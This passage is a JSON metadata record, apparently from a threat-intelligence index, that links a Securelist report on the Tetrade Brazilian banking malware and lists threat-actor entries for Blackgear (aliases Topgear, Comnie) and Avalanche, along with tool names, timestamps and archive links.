	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA",
		"MITRE"
	],
	"references": [
		"https://securelist.com/the-tetrade-brazilian-banking-malware/97779/"
	],
	"report_names": [
		"97779"
	],
	"threat_actors": [
		{
			"id": "ad59becc-29c2-4b7a-a958-d7f242d222ea",
			"created_at": "2023-01-06T13:46:38.956494Z",
			"updated_at": "2026-04-10T02:00:03.161471Z",
			"deleted_at": null,
			"main_name": "Blackgear",
			"aliases": [
				"BLACKGEAR",
				"Topgear",
				"Comnie"
			],
			"source_name": "MISPGALAXY:Blackgear",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6750d709-9153-4e90-baa3-04883a9b762b",
			"created_at": "2022-10-25T16:07:23.397596Z",
			"updated_at": "2026-04-10T02:00:04.580074Z",
			"deleted_at": null,
			"main_name": "Blackgear",
			"aliases": [
				"Topgear"
			],
			"source_name": "ETDA:Blackgear",
			"tools": [
				"Comnie",
				"Elirks",
				"Protux"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "bc289ba8-bc61-474c-8462-a3f7179d97bb",
			"created_at": "2022-10-25T16:07:24.450609Z",
			"updated_at": "2026-04-10T02:00:04.996582Z",
			"deleted_at": null,
			"main_name": "Avalanche",
			"aliases": [],
			"source_name": "ETDA:Avalanche",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434901,
	"ts_updated_at": 1775792159,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fd6f09453f5aba5c76dc2c38a4842e8baaedd9bb.pdf",
		"text": "https://archive.orkl.eu/fd6f09453f5aba5c76dc2c38a4842e8baaedd9bb.txt",
		"img": "https://archive.orkl.eu/fd6f09453f5aba5c76dc2c38a4842e8baaedd9bb.jpg"
	}
}